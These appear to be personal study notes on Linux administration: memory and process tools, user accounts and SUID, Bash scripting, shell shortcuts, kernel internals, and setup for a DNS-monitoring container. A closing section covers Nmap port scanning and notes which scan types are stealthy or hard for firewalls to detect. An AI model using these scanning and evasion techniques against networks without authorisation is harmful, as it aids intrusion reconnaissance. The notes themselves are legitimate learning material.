If a load average goes up to around 1, a single process is likely using all of that CPU. With multi-core/multi-processor systems, if a load average goes up to the number of cores (for example, 2 on a two-core system), all cores have just enough to do all of the time. To troubleshoot processes, use `top` or (preferably) `htop`. Processes consuming more CPU than others will typically rise to the top of the list.

A high load average doesn't necessarily mean there is a problem. If you see a high load average but your system is responding well, don't panic; the system just has a lot of processes sharing the CPU. On servers with high compute demands (such as web servers or servers performing scientific computations), processes and threads are started and stopped so quickly that load averages can be skewed and inaccurate. However, if a load average is high and system performance is suffering, you may be running into memory problems. When a system is low on memory, it starts to thrash, or rapidly swap pages to and from disk. This is less of a problem on modern systems using solid state storage such as SSDs or NVMe; on traditional systems with spinning media, it can be a real issue.

Measuring and troubleshooting memory

One of the simplest ways to view memory status on your system is to use the `free` command or view `/proc/meminfo`
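
For example (output layout varies slightly between versions):

free -m                    # memory and swap usage in MiB; watch the 'available' column
head -n 5 /proc/meminfo    # raw counters that free reads from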

You can also use vmstat to view memory performance on a system. vmstat is one of the oldest utilities for this purpose. It has minimal overhead and is a no-frills kind of program. The output is a bit difficult to read for those who are unfamiliar. You can use it to see how often the kernel is swapping pages in and out, how busy the CPU is, and how I/O resources are being utilized. To use it, run vmstat 2 (with 2 being the seconds in between updating the screen)

ryan:todo$ vmstat 2
procs -----------memory---------- ---swap-- -----io---- -system-- ------cpu-----
 r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa st
 2  0      0 23791304 233996 4724548    0    0    30    30   10  237  5  1 94  0  0
 0  0      0 23807492 233996 4704048    0    0     0   164 2571 3426  2  2 96  0  0
 0  0      0 23806096 234004 4703776    0    0     0    34  586 1424  1  0 99  0  0
 0  0      0 23808876 234004 4703968    0    0     0    70  522 1152  1  0 99  0  0
 0  0      0 23816764 234004 4696736    0    0     0     0  591 1293  1  0 99  0  0

Users and User Management

At the kernel level, Linux users are just numbers (UIDs), but to make working with users easier, we assign usernames to these numbers. Usernames only exist in user-space. Because of this, any program that wants to work with users on a Linux system will need to translate these usernames to UIDs.

/etc/passwd

The plaintext /etc/passwd file contains entries for every user on a system. Each line represents a user and has 7 fields separated by colons:

  1. the username
  2. the encrypted password for the user (this is no longer used, replaced by /etc/shadow). An x in this field indicates that the password is stored in /etc/shadow. An asterisk * indicates that the user cannot login. If the password field is blank (i.e. you see double colons ::), no password is required to login to this account.
  3. The user Id
  4. The group Id for the user (this field should correspond to one of the numbered entries in the /etc/group file)
  5. The user’s real name (aka the GECOS field)
  6. The user’s home directory
  7. The user’s login shell
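
A hypothetical entry illustrating the seven fields:

ryan:x:1000:1000:Ryan:/home/ryan:/bin/bash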

/etc/shadow

Contains encrypted passwords for user accounts

Special Users

You’ll find a few special users on a Linux system:

  1. root - always has UID 0 and GID 0
  2. daemon - never has login privileges
  3. nobody - an underprivileged user. Some processes run as nobody because they cannot write to anything on the system

Changing a password

Because /etc/passwd is just a text file, you can technically modify it directly to change a user's password. However, you shouldn't do this. Instead, use the passwd command to change a user's password. If for some reason you cannot use passwd, you should opt for vipw. This command prevents race conditions when modifying the /etc/passwd file, and it also creates a backup of the file.

SUID

When you temporarily switch to another user, all you are really doing is changing your user ID. There are two ways to do this, and the kernel handles both. The first way is with a setuid executable (such as sudo) and the second is with a setuid system call. The kernel has basic rules about what a process can or can't do, but here are the three essentials that cover setuid executables and system calls:

  1. A process can run a setuid executable as long as it has adequate file permissions
  2. A process running as root (user ID 0) can use setuid() system calls to become any other user
  3. A process not running as root has severe restrictions on how it may use setuid() system calls. In most cases, it cannot.

Because of these rules, you often need a combination of setuid executables and system calls to run a process as another user. For example, sudo has setuid root and once running, it may use setuid() syscalls to become another user.
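
You can see the setuid bit on such executables as an s in the owner's execute position of ls -l output (the size and date shown here are elided; they will differ on your system):

ls -l /usr/bin/sudo
-rwsr-xr-x 1 root root ... /usr/bin/sudo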

Effective UID (euid), Real UID (ruid), and Saved UID

Every process has more than one user ID. The effective user ID (euid) is the one you are likely familiar with: it is the user ID that the process is currently running as. However, the process also has a real user ID (ruid), which indicates who started the process. Normally these two values are the same. However, when you execute a setuid program, Linux sets the euid to the owner of the program file, but keeps your original user ID in the ruid. Processes also have a saved UID, but you will not need to work with it often.

As stated above, most processes have the same EUID and RUID. As a result, the default output for the `ps` command and other system diagnostic programs only show the EUID. To view both the EUID and RUID, you can run:

ps -eo pid,euser,ruser,comm

Bash

Directory Map

bash notes

Variables

Special Variables

  • $0 - The name of the Bash script.
  • $1 - $9 - The first 9 arguments to the Bash script.
  • $# - How many arguments were passed to the Bash script.
  • $@ - All the arguments supplied to the Bash script.
  • $? - The exit status of the most recently run process.
  • $$ - The process ID of the current script.
  • $USER - The username of the user running the script.
  • $HOSTNAME - The hostname of the machine the script is running on.
  • $SECONDS - The number of seconds since the script was started.
  • $RANDOM - Returns a different random number each time it is referred to.
  • $LINENO - Returns the current line number in the Bash script.

Input

Command Line Input

#!/bin/bash
# A simple copy script
cp $1 $2
# Let's verify the copy worked
echo Details for $2
ls -lh $2

Input in scripts

If we would like to ask the user for input in a script, we use a command called read. This command takes the input and will save it into a variable.

#!/bin/bash
# Ask the user for their name
echo Hello, who am I talking to?
read varname
echo It\'s nice to meet you $varname

You are able to alter the behaviour of read with a variety of command line options. (See the man page for read to see all of them.) Two commonly used options however are -p which allows you to specify a prompt and -s which makes the input silent. This can make it easy to ask for a username and password combination like the example below:

#!/bin/bash
# Ask the user for login details
read -p 'Username: ' uservar
read -sp 'Password: ' passvar
echo
echo Thankyou $uservar we now have your login details

You can use read to get multiple variables as well:

#!/bin/bash
# Demonstrate how read actually works
echo What cars do you like?
read car1 car2 car3
echo Your first car was: $car1
echo Your second car was: $car2
echo Your third car was: $car3

Input from stdin

#!/bin/bash
# A basic summary of my sales report
echo Here is a summary of the sales data:
echo ====================================
echo
cat /dev/stdin | cut -d' ' -f 2,3 | sort

Arithmetic

let

let is a builtin command of Bash that allows us to do simple arithmetic. It follows the basic format:

#!/bin/bash
# Basic arithmetic using let
let a=5+4
echo $a # 9
let "a = 5 + 4"
echo $a # 9
let a++
echo $a # 10
let "a = 4 * 5"
echo $a # 20
let "a = $1 + 30"
echo $a # 30 + first command line argument

Here is a table with some common operations:

  • +, -, *, / : addition, subtraction, multiplication, division
  • var++ : increase the variable var by 1
  • var-- : decrease the variable var by 1
  • % : modulus (return the remainder after division)

Conditionals

If statements (and, closely related, case statements) allow us to make decisions in our Bash scripts. They allow us to decide whether or not to run a piece of code based upon conditions that we may set. If statements, combined with loops (which we’ll look at in the next section) allow us to make much more complex scripts which may solve larger tasks.

If Statements

if [ <some test> ]
then
  <commands>
fi

Anything between then and fi (if backwards) will be executed only if the test (between the square brackets) is true.

Let’s look at a simple example:

#!/bin/bash
if [ $1 -gt 100 ]
then
  echo Hey that\'s a large number.
  pwd
fi
date
03:54:59 ryan@localhost $./test.sh 134
Hey that's a large number.
/repos/PersonalProjects/shell
Tue Jan 17 15:55:03 EST 2023

The square brackets [] in the if statement above are actually a reference to the test command. This means that all of the operators that test allows may be used here as well.
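
For instance, a few common test operators (see man test for the full list); the file and string used here are just arbitrary examples:

#!/bin/bash
if [ -f /etc/passwd ]        # true if the path exists and is a regular file
then
  echo /etc/passwd exists
fi
if [ "$USER" = "root" ]      # string comparison
then
  echo running as root
fi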

if/elif/else

#!/bin/bash
# elif statements
if [ $1 -ge 18 ]
then
  echo You may go to the party.
elif [ $2 == 'yes' ]
then
  echo You may go to the party but be back before midnight.
else
  echo You may not go to the party.
fi

case statements

Sometimes we may wish to take different paths based upon a variable matching a series of patterns. We could use a series of if and elif statements, but that would soon grow unwieldy. Fortunately there is a case statement which can make things cleaner. It's a little hard to explain, so here are some examples to illustrate:

#!/bin/bash
# case example
case $1 in
  start)
    echo starting
    ;;
  stop)
    echo stopping
    ;;
  restart)
    echo restarting
    ;;
  *)
    echo don\'t know
    ;;
esac

Loops

while loops

#!/bin/bash

# Basic while loop

counter=1
while [ $counter -le 10 ]
do
  echo $counter
  ((counter++))
done
echo All done

until loop

#!/bin/bash

# Basic until loop

counter=1
until [ $counter -gt 10 ]
do
  echo $counter
  ((counter++))
done
echo All done

Moving the cursor:

  Ctrl + a   Go to the beginning of the line (Home)
  Ctrl + e   Go to the End of the line (End)
  Ctrl + p   Previous command (Up arrow)
  Ctrl + n   Next command (Down arrow)
   Alt + b   Back (left) one word
   Alt + f   Forward (right) one word
  Ctrl + f   Forward one character
  Ctrl + b   Backward one character
  Ctrl + xx  Toggle between the start of line and current cursor position

Editing:

 Ctrl + L   Clear the Screen, similar to the clear command

  Alt + Del Delete the Word before the cursor.
  Alt + d   Delete the Word after the cursor.
 Ctrl + d   Delete character under the cursor
 Ctrl + h   Delete character before the cursor (Backspace)

 Ctrl + w   Cut the Word before the cursor to the clipboard.
 Ctrl + k   Cut the Line after the cursor to the clipboard.
 Ctrl + u   Cut/delete the Line before the cursor to the clipboard.

  Alt + t   Swap current word with previous
 Ctrl + t   Swap the last two characters before the cursor (typo).
 Esc  + t   Swap the last two words before the cursor.

 ctrl + y   Paste the last thing to be cut (yank)
  Alt + u   UPPER capitalize every character from the cursor to the end of the current word.
  Alt + l   Lower the case of every character from the cursor to the end of the current word.
  Alt + c   Capitalize the character under the cursor and move to the end of the word.
  Alt + r   Cancel the changes and put back the line as it was in the history (revert).
 ctrl + _   Undo

 TAB        Tab completion for file/directory names
For example, to move to a directory named 'sample1': type cd sam, then press TAB and ENTER.
Type just enough characters to uniquely identify the directory you wish to open.

Special keys: Tab, Backspace, Enter, Esc

Text Terminals send characters (bytes), not key strokes.
Special keys such as Tab, Backspace, Enter and Esc are encoded as control characters.
Control characters are not printable, they display in the terminal as ^ and are intended to have an effect on applications.

Ctrl+I = Tab
Ctrl+J = Newline
Ctrl+M = Enter
Ctrl+[ = Escape

Many terminals will also send control characters for keys in the digit row:
Ctrl+2 → ^@
Ctrl+3 → ^[ Escape
Ctrl+4 → ^\
Ctrl+5 → ^]
Ctrl+6 → ^^
Ctrl+7 → ^_ Undo
Ctrl+8 → ^? Backward-delete-char

Ctrl+v tells the terminal to not interpret the following character, so Ctrl+v Ctrl-I will display a tab character,
similarly Ctrl+v ENTER will display the control character sent by the Enter key: ^M

History:

  Ctrl + r   Recall the last command matching the characters you type
             (incrementally searches the command history as you type).
             The history itself is stored in ~/.bash_history.
  Ctrl + p   Previous command in history (i.e. walk back through the command history).
  Ctrl + n   Next command in history (i.e. walk forward through the command history).

  Ctrl + s   Search forward through the history (the counterpart to Ctrl+r).
             (Beware: in most terminals Ctrl+s also sends XOFF, freezing output; resume with Ctrl+q.)
  Ctrl + o   Execute the command found via Ctrl+r or Ctrl+s
  Ctrl + g   Escape from history searching mode
        !!   Repeat last command
       !:n   Argument n of the last command, e.g. !:2 for the second argument.
       !:n-m Arguments n through m of the last command, e.g. !:2-3 for the second and third.
       !:n*  Arguments n through the last argument of the last command.
       !n:p  Print command number n from the history without executing it.
     !string Run the most recent command beginning with string (append :p to print it instead).
       !:q   Quote the last command with proper Bash escaping applied.
              Tip: enter a line of Bash starting with a # comment, then run !:q on the next line to escape it.
        !$   Last argument of previous command.
   ALT + .   Last argument of previous command.
        !*   All arguments of previous command.
^abc^def   Run previous command, replacing abc with def

Process control:

 Ctrl + C   Interrupt/Kill whatever you are running (SIGINT).
 Ctrl + l   Clear the screen.
 Ctrl + s   Stop output to the screen (for long running verbose commands).
            Then use PgUp/PgDn for navigation.
 Ctrl + q   Allow output to the screen (if previously stopped using command above).
 Ctrl + D   Send an EOF marker, unless disabled by an option, this will close the current shell (EXIT).
 Ctrl + Z   Send the signal SIGTSTP to the current task, which suspends it.
             To return to it later, run fg (or fg %jobnumber) to bring it back to the foreground.

Commands

Directory Map

chgrp

chgrp can be used to change the owning group of a file or directory
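
For example (the group name and paths here are hypothetical):

chgrp developers report.txt          # change the owning group of a file
chgrp -R developers /srv/project     # recurse through a directory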

Chmod

Chmod is used to manage permissions (mode) on a file or directory

The syntax of the chmod command when using the numeric (octal) mode has the following format:

chmod [OPTIONS] NUMBER FILE...

When using the numeric mode, you set the permissions for all three user classes (owner, group, and all others) at the same time.

The permission number can be a 3- or 4-digit number. When a 3-digit number is used, the first digit represents the permissions of the file's owner, the second the file's group, and the last all other users.

The read, write, and execute permissions have the following numeric values:

  • r (read) = 4
  • w (write) = 2
  • x (execute) = 1
  • no permissions = 0

The permissions number of a specific user class is represented by the sum of the values of the permissions for that group.

To find out the file’s permissions in numeric mode, simply calculate the totals for all users’ classes. For example, to give read, write and execute permission to the file’s owner, read and execute permissions to the file’s group and only read permissions to all other users, you would do the following:

  • Owner: rwx=4+2+1=7
  • Group: r-x=4+0+1=5
  • Others: r--=4+0+0=4

Using the method above, we arrive at the number 754, which represents the desired permissions.

When a 4-digit number is used, the first digit has the following meaning:

  • setuid=4
  • setgid=2
  • sticky=1
  • no changes = 0

The next three digits have the same meaning as in the 3-digit form.

If the first digit is 0 it can be omitted, and the mode can be represented with 3 digits. The numeric mode 0755 is the same as 755.

To calculate the numeric mode, you can also use another method (binary method), but it is a little more complicated. Knowing how to calculate the numeric mode using 4, 2, and 1 is sufficient for most users.

You can check the file’s permissions in the numeric notation using the stat command:

stat -c "%a" file_name

Here are some examples of how to use the chmod command in numeric mode:

  • Give the file’s owner read and write permissions and only read permissions to group members and all other users:

chmod 644 filename

  • Give the file’s owner read, write and execute permissions, read and execute permissions to group members and no permissions to all other users:

chmod 750 filename

  • Give read, write, and execute permissions, and a sticky bit to a given directory:

chmod 1777 dirname

  • Recursively set read, write, and execute permissions to the file owner and no permissions for all other users on a given directory:

chmod -R 700 dirname

chown

chown can be used to change the owning user
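
For example (user, group, and paths here are hypothetical):

chown ryan report.txt                # change the owning user
chown ryan:developers report.txt     # change the owner and group at once
chown -R ryan /srv/project           # recurse through a directory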

dd

  • dd is useful when working with block and character devices
  • dd’s sole purpose is to read from an input file or stream and write to an output file or stream
  • dd copies data in blocks of a fixed size

example usage

dd if=/dev/zero of=new_file bs=1024 count=1

the dd command syntax differs from most other unix style commands. It is based on an old IBM job control language (JCL) style.

groups

groups can be used to view what group memberships a user has
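
Example (the output shown is illustrative):

$ groups ryan
ryan : ryan sudo docker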

ip

Show IP stack Info

Example

$ ip addr
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
      valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
      valid_lft forever preferred_lft forever
2: eth0:  mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:22:48:27:87:eb brd ff:ff:ff:ff:ff:ff
    inet 172.16.1.4/24 brd 172.16.1.255 scope global noprefixroute eth0
      valid_lft forever preferred_lft forever
    inet6 fe80::222:48ff:fe27:87eb/64 scope link
      valid_lft forever preferred_lft forever
3: enP12806s1:  mtu 1500 qdisc mq master eth0 state UP group default qlen 1000
    link/ether 00:22:48:27:87:eb brd ff:ff:ff:ff:ff:ff

Job Control

Normally, when you start a command in a shell, you don’t get the shell prompt back until the program finishes executing. You can detach a process from the shell using the ampersand (&), which will send it to the background.

You can use jobs to view currently running background jobs. You can use fg %jobnumber (or just fg for the most recent job) to bring a background job back to the foreground.
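
A short session tying these together (the PID and job number shown are illustrative):

$ sleep 300 &
[1] 8416
$ jobs
[1]+  Running                 sleep 300 &
$ fg %1
sleep 300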

Kill

kill can be used to kill a process

Usage/Output

$ kill 22541
[1]+  Terminated              sleep 60

Commonly Used Options

  • Kill can be used without any options. However, you can also specify what signal to use:
$ kill -l
 1) SIGHUP       2) SIGINT       3) SIGQUIT      4) SIGILL       5) SIGTRAP
 6) SIGABRT      7) SIGBUS       8) SIGFPE       9) SIGKILL     10) SIGUSR1
11) SIGSEGV     12) SIGUSR2     13) SIGPIPE     14) SIGALRM     15) SIGTERM
16) SIGSTKFLT   17) SIGCHLD     18) SIGCONT     19) SIGSTOP     20) SIGTSTP
21) SIGTTIN     22) SIGTTOU     23) SIGURG      24) SIGXCPU     25) SIGXFSZ
26) SIGVTALRM   27) SIGPROF     28) SIGWINCH    29) SIGIO       30) SIGPWR
31) SIGSYS      34) SIGRTMIN    35) SIGRTMIN+1  36) SIGRTMIN+2  37) SIGRTMIN+3
38) SIGRTMIN+4  39) SIGRTMIN+5  40) SIGRTMIN+6  41) SIGRTMIN+7  42) SIGRTMIN+8
43) SIGRTMIN+9  44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9  56) SIGRTMAX-8  57) SIGRTMAX-7
58) SIGRTMAX-6  59) SIGRTMAX-5  60) SIGRTMAX-4  61) SIGRTMAX-3  62) SIGRTMAX-2
63) SIGRTMAX-1  64) SIGRTMAX
$ sleep 60 &
[1] 22661
$ kill -s 9 22661
[1]+  Killed                  sleep 60

  • If you do not specify a signal, SIGTERM (15) is used
  • You can stop a process (it will still reside in memory) with signal 19, and resume it with signal 18
  • All signals except for SIGKILL (9) can be ignored. SIGKILL does not give a process the chance to clean up after itself or finish work. The kernel immediately terminates the process and forcibly removes it from memory.

lsscsi

  • can be used to walk the SCSI device paths provided by sysfs
  • not installed on most systems by default

passwd

Can be used to manipulate user passwords

Example: passwd ryan

ps

ps is used for viewing process status

Usage/Output

$ ps
PID        TTY     STAT   TIME          CMD
5140     pts/4    Ss        00:00:00     bash
61244    pts/4    R+        00:00:00     ps
  • PID = the process Id
  • TTY = the terminal device where the process is running
  • STAT = the current status of the process. It can be S for sleeping, R for running, etc. See the man page ps(1) for more info
  • TIME = the CPU time that the process has used. Note that this is different than the ‘wall-clock’ time
  • CMD = the command used to start the process

Commonly Used Options

There are many options available to the ps command. To make things more confusing, you can specify options in 3 different styles - Unix, BSD, and GNU. Most people use the BSD style, as it is seemingly most comfortable to use (less typing).

Here are some of the most commonly used BSD-style options:

  • ps x = show all of your running processes
  • ps ax = show all processes on the system, not just those that you own
  • ps u = Include more detailed information on processes
  • ps w = show full command names, not just what fits on a single line
  • ps u $$ = status of the current process
  • ps aux = show all processes for all users with verbose detail

umask

See page 37

Greybeard Qualification

Directory Map

Block Devices and File Systems

Device Special Files

  • In Linux, everything is a File
  • /dev contains device files
  • mknod can be used to make a device file
    • Example: mknod mydevice b 1 1
  • udev manages devices, it creates the device files in the /dev directory

Memory Management

  • pmap <pid>
    • any line showing ‘anon’ memory is the heap
  • page tables are supported directly by the CPU and memory management unit (MMU)
  • The page table turns logical memory addresses into real RAM addresses
  • The kernel allocates pages
  • Pages are allocated and mapped when a program is loaded at run time
  • When a program needs more memory, allocate from the heap
  • Processes that need a shared library will all reference the same pages for that shared object in memory
  • If you don't have enough memory available, pages are swapped out to disk (a swap-file example follows this list)
    • Create swap space with mkswap
    • Start with swapon
    • Any partition with type 82 will be allocated as swap type at boot
  • /proc/<pid>/smaps
    • Detailed information about paging for a process
  • /proc/meminfo - system-wide memory statistics
  • RSS: Resident set size
    • How much virtual memory is in real memory
  • Thrashing
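
A minimal swap-file sketch (the path and 1 GiB size are arbitrary; run as root):

dd if=/dev/zero of=/swapfile bs=1M count=1024   # create a 1 GiB file
chmod 600 /swapfile
mkswap /swapfile                                # format it as swap space
swapon /swapfile                                # start using it
swapon --show                                   # verify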

Execution and Scheduling of Processes and Threads

How are processes made?

  • Processes are created with fork()
  • The new process created with fork() is an exact copy of its parent
    • Everything is copied from the parent except for file locks and any pending signals
    • the fork() system call has a return value of > 0 if you’re the parent, if you’re the child the value will be 0. If there is an error the return value will be less than 0.
    • fork() doesn't copy all memory to the child at first. The child process shares the memory of the parent until the child or parent needs to write to it. Then the process that needs to modify the memory copies just that page and makes its change. This is called Copy On Write (COW).
    • On Linux, C libraries typically implement fork() by wrapping clone()

Daemons

  • Services / background processes
  • How to make a daemon:
    • Fork the parent process, then the parent exits, leaving the child process with parent init (pid=1)
    • Close all open files
    • Become the process group leader
      • a Process Group
    • Set the umask
    • Change dir to a safe place
    • Possibly ignore some signals

Process Scheduling

  • Priority determines which process gets to run
  • The kernel constantly has to decide which process to run next
  • Context switching involves moving register values out of the CPU and into memory, and loading registers for the next process to run
  • Every process has a task state associated with it. The states are:
    • TASK_RUNNING
      • Processes in the running state have a time quantum to run within. By default, 100ms.
      • The kernel checks the process time quantum every tick.
    • TASK_INTERRUPTIBLE
    • TASK_UNINTERRUPTIBLE
      • This is rare
    • TASK_STOPPED
    • TASK_TRACED
      • Example: tracing the process with strace
    • EXIT_ZOMBIE
    • EXIT_DEAD

Threads

  • a thread is a lightweight process
  • Threads of a process all run in the same memory address space
    • A thread has its own instruction pointer
    • The stack is not shared. Each has its own stack.
    • In linux all threads have their own PID
    • Threads will spin (spin-lock) if they are waiting to access memory that is locked by another thread
      • Threads that are spinning do not go to sleep or yield back to the kernel

Process Structure and IPC

What is a process?

  • A running program
  • Executable binary (ELF File)
  • A set of data structures in the kernel
    • This is the process itself
    • Helps the kernel keep track of resources used by the process (open files, mmap, etc.)
  • Unit to which the kernel allocates resources
  • Parts of a process:
    • PID
    • PPID
    • Open files
      • Array of file descriptors in task struct (0 is stdin, 1 is stdout, 2 is stderr, and so on…)
    • TTY (pseudo tty nowadays)
    • UID (a signed integer)
      • a process can change its UID by using setuid
    • GID (a signed integer)
    • Priority (can be set with nice value (renice for already running processes))
    • limits (rlimit)
    • timestamps / counters
  • processes are defined as task_struct in sched.h of the source
  • What can you do with a process?
    • Create
    • Send a signal (kill)
    • Get information about (ps, pidof, etc.)

Process memory

  • Heap grows up
  • Stack grows down
  • Data section for initialized variables and data
  • malloc to allocate memory on the heap
  • free to free memory from the heap
  • You can see the mmap of a running process using pmap <pid>

Resource Limits

  • rlimits or ulimits (shell)
  • getrlimit() or setrlimit()
  • ulimit -a to view limits (example after this list)
  • Use to control users, processes
  • Usage is not common these days
  • Default limits exist
  • stored in /etc/security/limits.conf
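
For example, viewing and raising the open-files limit for the current shell (the value 4096 is arbitrary and must stay within the hard limit):

ulimit -n          # show the current open-files soft limit
ulimit -n 4096     # raise it for this shell session
ulimit -a          # show all limits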

Process Priority

  • Set nice value with nice command
  • nice() system call
  • a regular user can only increase the nice value (decreasing its priority)
  • in all cases, higher number means lower priority
  • top and ps -eo can be used to view the nice value
  • Default value for nice is 0

IPC

  • How processes talk to each other
  • Also available but used less often: FIFOs, semaphores, shared memory
  • Sockets, pipes, signals
  • Pipes exist entirely in memory, no files or disk IO are involved
  • Pipes can only exist between members of the same family in the process tree
  • If you want a pipe between processes that are not in the same process family tree, you can use a FIFO (named pipe), which is a file on disk created with mkfifo (see the example after this list)
  • View all signals with kill -l
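
A quick FIFO sketch (the path is arbitrary):

mkfifo /tmp/myfifo             # create the named pipe (a file on disk)
cat /tmp/myfifo &              # the reader blocks until data arrives
echo hello > /tmp/myfifo       # the writer; the backgrounded cat prints "hello"
rm /tmp/myfifo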

Startup and Init

  • Bootstrapping
    • First thing that happens when you power on a system is a positive voltage (5v) is applied to the reset pin of the CPU
    • Two registers are initialized:
      • CS register: the code segment register (together with EIP, it gives the address of the first instruction to execute)
      • EIP register: the instruction pointer (the current instruction to execute)
    • Load the BIOS from ROM
      • Linux doesn’t use the BIOS after boot, it only uses device drivers loaded by the kernel
      • MSDOS used the BIOS to execute system calls
      • BIOS Steps:
        1. POST (Power on self test)
        2. ACPI - builds tables of devices with information regarding power. These can be used to decide when the system can power down a device or set it to a lower power level
        3. Hardware Initialisation
        • 3 ways to communicate with devices on a PC:
          1. IO port from CPU to the device for communication via a port address
          2. Map memory from the device to the address space of the computer and read/write to it
          3. Use interrupts
        4. Find a boot device by searching for a boot sector on each device.
        • The first sector of a disk is the master boot record (MBR), which contains the partition table and a boot loader (GRUB)

Linux Kernel Development

Building the Linux Kernel

Kernel Modules

Tools

Directory Map

Need to add/refine:

  • Build for multiple platforms

  • Support consumption by other programs via stdout/stderr

  • rename directory structure

    • Example: in getheaders, ./cmd/getHeaders should be ./cmd/cli
  • finish [ ] httpedia [ ] httpbench [ ] crayola [ ] goal? [ ] dnscache [ ] podcrashcollector [ ] dnsfixer [ ] taint-remover [ ] httpstat

instructions for using dnspinger

Before deploying dnsPinger, you will want to create an App Insights workspace.

In this package, you will find a file named env.vars. This file contains a list of environment variables that will be passed to the container:

DNSPINGER_CUSTOM_DIMENSIONS=NodePool=mylaptop;env=local
DNSPINGER_DOMAINS=www.google.com;homedepot.aprimo.com;api.videoindexer.ai
DNSPINGER_REGION=us1
DNSPINGER_RESOLVERS=google=8.8.8.8;opendns=208.67.222.222;azure=168.63.129.16
APPINSIGHTS_INSTRUMENTATIONKEY=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

The following section will explain these environment variables and their usage:

  • DNSPINGER_CUSTOM_DIMENSIONS: A list of semi-colon (;) delimited key-value pairs. In addition to the other environment variables, these are passed to the Log Analytics customEvents table as customDimensions. The idea here was to include the name of the nodepool where this application is running and any other pertinent information.
  • DNSPINGER_DOMAINS: A semi-colon (;) delimited list of domains to resolve.
  • DNSPINGER_REGION: The region where the application is running. We implemented this because (as stated on our call), we are running AKS in 3 regions (Australia East, East US, and West Europe)
  • DNSPINGER_RESOLVERS: A list of semi-colon (;) delimited key-value pairs. The key is the name of a resolver (this is just an arbitrary string used for identification) and the value is the IP address of the resolver
  • APPINSIGHTS_INSTRUMENTATIONKEY: The App Insights instrumentation key where the logs can be uploaded to

You can also view logs by tailing the pod:

Found domain to resolve: www.google.com
[google]        Resolving www.google.com: 142.250.190.36
[opendns]       Resolving www.google.com: 142.250.191.196
[DotnetResolver]        Resolving www.google.com: 172.253.62.103,172.253.62.147,172.253.62.99,172.253.62.104,172.253.62.105,172.253.62.106
[DefaultResolver]       Resolving www.google.com: 172.253.62.103,172.253.62.147,172.253.62.99,172.253.62.104,172.253.62.105,172.253.62.106
Found domain to resolve: homedepot.aprimo.com
[google]        Resolving homedepot.aprimo.com: 52.255.216.147
[opendns]       Resolving homedepot.aprimo.com: 52.255.216.147
[DotnetResolver]        Resolving homedepot.aprimo.com: 52.255.216.147
[DefaultResolver]       Resolving homedepot.aprimo.com: 52.255.216.147
Found domain to resolve: api.videoindexer.ai
[google]        Resolving api.videoindexer.ai: 52.162.125.85
[opendns]       Resolving api.videoindexer.ai: 52.162.125.85
[DotnetResolver]        Resolving api.videoindexer.ai: 168.62.50.75
[DefaultResolver]       Resolving api.videoindexer.ai: 168.62.50.75
Found domain to resolve: www.microsoft.com
[google]        Resolving www.microsoft.com: 184.84.226.4
[opendns]       Resolving www.microsoft.com: 23.78.9.173
[DotnetResolver]        Resolving www.microsoft.com: 104.72.157.175
[DefaultResolver]       Resolving www.microsoft.com: 104.72.157.175
[MessagesSent]  0
[MessagesReceived]      0
[ErrorsSent]    0
[ErrorsReceived]        0
[EchoRequestsSent]      0
[EchoRequestsReceived]  0
[EchoRepliesSent]       0
[EchoRepliesReceived]   0
[DestinationUnreachableMessagesSent]    0
[DestinationUnreachableMessagesReceived]        0
[SourceQuenchesSent]    0
[SourceQuenchesReceived]        0
[RedirectsSent] 0
[RedirectsReceived]     0
[TimeExceededMessagesSent]      0
[TimeExceededMessagesReceived]  0
[ParameterProblemsSent] 0
[ParameterProblemsReceived]     0
[TimestampRequestsSent] 0
[TimestampRequestsReceived]     0
[TimestampRepliesSent]  0
[TimestampRepliesReceived]      0
[AddressMaskRequestsSent]       0
[AddressMaskRequestsReceived]   0
[AddressMaskRepliesSent]        0
[AddressMaskRepliesReceived]    0

You will also see some network statistics in the logs.

To run locally: docker run --env-file ./env.vars rnemethaprimo/dnspinger:latest

To run in Kubernetes: Use the attached deployment.yaml (be sure to update the env vars accordingly)

Some simple LA queries to get you started:

// get all failed queries in the last 10 minutes:

let t = 10m;
customEvents
| where timestamp > ago(t)
| where customDimensions.Success == false

// get log entries for a resolver
customEvents
| where customDimensions.Resolver == "azure"

Nmap

Understanding how Nmap works is critical for interpreting scan results. After confirming a host is alive, scanning helps identify:

  • Open ports & services
  • Service versions
  • Service information
  • Operating system details

Port States (6 Total)

  • open: the target accepts connections (TCP/UDP/SCTP)
  • closed: replies with a RST; the port is reachable but no service is listening
  • filtered: no response or an error; filtering prevents state determination
  • unfiltered: only in ACK scans; the port is reachable, but its state is unknown
  • open|filtered: no response; likely filtered or silently dropped
  • closed|filtered: only in idle scans; cannot determine closed vs filtered

TCP Scanning

ACK Scan (-sA)

  • Difficult for firewalls to detect.
  • TCP packet only has the ACK flag set, forcing a RST response from unfiltered ports.
  • Packets with the ACK flag set are usually used to acknowledge received data, so firewalls may not log them as suspicious or block them.

SYN Scan (-sS)

  • Default when running as root.
  • Fast & stealthy (half‑open).
  • Interprets SYN‑ACK -> open, RST -> closed.

Port selection examples

  • -p 22,80,445
  • -p 22-445
  • --top-ports=10
  • -p-
  • -F (top 100)
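
Putting a few of these port-selection options together with a SYN scan (the target IP is hypothetical):

sudo nmap -sS -p 22,80,445 -n --reason 10.129.2.28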

Packet Tracing (--packet-trace)

Shows packets sent/received.
Example for closed port:

  • SENT: SYN
  • RCVD: RST/ACK -> closed

TCP Connect Scan (-sT)

  • Used when not root.
  • Completes full handshake.
  • Most accurate, least stealthy.
  • Logged by services/IDS.
  • Useful when outbound connections allowed but inbound blocked.

Filtered Ports

Dropped packets:

  • No reply -> Nmap retries (default 10).
  • Slow scan.

Rejected packets:

  • ICMP type 3 code 3 -> port unreachable -> likely firewall rejection.

UDP Scanning (-sU)

  • Slow due to long timeouts.
  • Many ports show open|filtered due to lack of responses.
  • Determining states:
    • UDP response -> open
    • ICMP type 3 code 3 -> closed
    • No response -> open|filtered

Version Detection (-sV)

Probes services to identify:

  • Service name
  • Version
